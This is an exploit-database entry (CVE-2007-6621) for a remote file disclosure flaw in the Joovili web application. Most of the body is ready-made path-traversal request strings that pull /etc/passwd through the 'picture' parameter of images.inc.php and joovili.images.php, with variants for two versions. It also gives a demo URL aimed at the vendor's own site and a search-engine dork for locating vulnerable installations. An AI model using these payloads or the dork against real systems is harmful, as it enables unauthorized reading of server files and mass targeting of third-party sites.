Joovili <= 3.0.6 (joovili.images.php) Remote File Disclosure Vulnerability



EDB-ID: 4799 CVE: 2007-6621 OSVDB-ID: 39666
Author: EcHoLL Published: 2007-12-27 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next 
found by EcHoLL
version: 2.***
include/images.inc.php?picture=../../../../../../../../etc/passwd&thumbnail=FALSE
include/images.inc.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE
 
version 3.**
joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
joovili.images.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE
 
 
demo
http://demo.joovili.com/include/joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
dork: powered by joovili

# milw0rm.com [2007-12-27]






Comments

No comments so far